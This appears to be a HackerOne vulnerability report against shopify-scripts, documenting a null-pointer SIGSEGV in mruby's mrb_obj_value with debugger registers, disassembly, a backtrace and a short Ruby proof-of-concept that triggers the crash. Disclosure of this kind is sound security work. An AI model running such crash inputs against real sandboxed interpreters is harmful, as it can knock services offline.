shopify-scripts: SIGSEGV - mrb_obj_value

2017-03-15T20:35:55
ID H1:213779
Type hackerone
Reporter icanthack
Modified 2017-04-19T07:40:02

Description

Linux Ubuntu Xenial 64 commit f8b31a0db671b71d2794ce866b87596a09c10bf0 Author: Yukihiro "Matz" Matsumoto <matz@ruby-lang.org> Date: Wed Mar 15 09:00:03 2017 +0900

output RAX: 0x0 RBX: 0x6c4e80 --&gt; 0x1 RCX: 0x6c4e50 --&gt; 0x6b4320 --&gt; 0x112 RDX: 0xf222f69400000003 RSI: 0x6b4320 --&gt; 0x112 RDI: 0x0 RBP: 0x7fffffffdb10 --&gt; 0x7fffffffe1d0 --&gt; 0x7fffffffe220 --&gt; 0x7fffffffe280 --&gt; 0x7fffffffe410 --&gt; 0x7fffffffe440 (--&gt; ...) RSP: 0x7fffffffdaf0 --&gt; 0x6bc8d0 --&gt; 0x9109 RIP: 0x417da4 (&lt;mrb_obj_value+16&gt;: movzx eax,BYTE PTR [rax]) R8 : 0x3 R9 : 0x7fffffffe1d0 --&gt; 0x7fffffffe220 --&gt; 0x7fffffffe280 --&gt; 0x7fffffffe410 --&gt; 0x7fffffffe440 --&gt; 0x7fffffffe500 (--&gt; ...) R10: 0x12 R11: 0x7ffff7899390 --&gt; 0xfffda380fffda0af R12: 0x0 R13: 0x3 R14: 0x0 R15: 0x0 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x417d98 &lt;mrb_obj_value+4&gt;: sub rsp,0x20 0x417d9c &lt;mrb_obj_value+8&gt;: mov QWORD PTR [rbp-0x18],rdi 0x417da0 &lt;mrb_obj_value+12&gt;: mov rax,QWORD PTR [rbp-0x18] =&gt; 0x417da4 &lt;mrb_obj_value+16&gt;: movzx eax,BYTE PTR [rax] 0x417da7 &lt;mrb_obj_value+19&gt;: movzx eax,al 0x417daa &lt;mrb_obj_value+22&gt;: mov DWORD PTR [rbp-0x8],eax 0x417dad &lt;mrb_obj_value+25&gt;: mov rax,QWORD PTR [rbp-0x18] 0x417db1 &lt;mrb_obj_value+29&gt;: mov QWORD PTR [rbp-0x10],rax [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdaf0 --&gt; 0x6bc8d0 --&gt; 0x9109 0008| 0x7fffffffdaf8 --&gt; 0x0 0016| 0x7fffffffdb00 --&gt; 0x1 0024| 0x7fffffffdb08 --&gt; 0x2 0032| 0x7fffffffdb10 --&gt; 0x7fffffffe1d0 --&gt; 0x7fffffffe220 --&gt; 0x7fffffffe280 --&gt; 0x7fffffffe410 --&gt; 0x7fffffffe440 (--&gt; ...) 0040| 0x7fffffffdb18 --&gt; 0x41b658 (&lt;mrb_vm_exec+4559&gt;: mov QWORD PTR [rbp-0x2e0],rax) 0048| 0x7fffffffdb20 --&gt; 0x6b20e8 --&gt; 0x6fc830 --&gt; 0x708800 --&gt; 0x1 0056| 0x7fffffffdb28 --&gt; 0x71bba4 --&gt; 0x24000980181001b [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x0000000000417da4 in mrb_obj_value (p=0x0) at /home/ubuntu/mruby/include/mruby/value.h:212 212 SET_OBJ_VALUE(v, (struct RBasic*)p);

backtrace ```

0 0x0000000000417da4 in mrb_obj_value (p=0x0) at /home/ubuntu/mruby/include/mruby/value.h:212

1 0x000000000041b658 in mrb_vm_exec (mrb=0x6b2010, proc=0x6b4d40, pc=0x71bba4)

at /home/ubuntu/mruby/src/vm.c:1096

2 0x000000000041a487 in mrb_vm_run (mrb=0x6b2010, proc=0x6b4d40, self=..., stack_keep=0x0)

at /home/ubuntu/mruby/src/vm.c:820

3 0x000000000042291f in mrb_top_run (mrb=0x6b2010, proc=0x6b4d40, self=..., stack_keep=0x0)

at /home/ubuntu/mruby/src/vm.c:2615

4 0x000000000044925b in mrb_load_exec (mrb=0x6b2010, p=0x70eda0, c=0x70da00)

at /home/ubuntu/mruby/mrbgems/mruby-compiler/core/parse.y:5760

5 0x00000000004492f1 in mrb_load_file_cxt (mrb=0x6b2010, f=0x70e9f0, c=0x70da00)

at /home/ubuntu/mruby/mrbgems/mruby-compiler/core/parse.y:5769

6 0x00000000004022f0 in main (argc=0x2, argv=0x7fffffffe5e8)

at /home/ubuntu/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:227

7 0x00007ffff7725830 in __libc_start_main (main=0x401fd6 <main>, argc=0x2, argv=0x7fffffffe5e8,

init=&lt;optimized out&gt;, fini=&lt;optimized out&gt;, rtld_fini=&lt;optimized out&gt;, 
stack_end=0x7fffffffe5d8) at ../csu/libc-start.c:291

8 0x00000000004019b9 in _start ()

```

PoC ``` begin rescue => a end

begin b rescue begin c "" rescue => d 0 ensure end end ```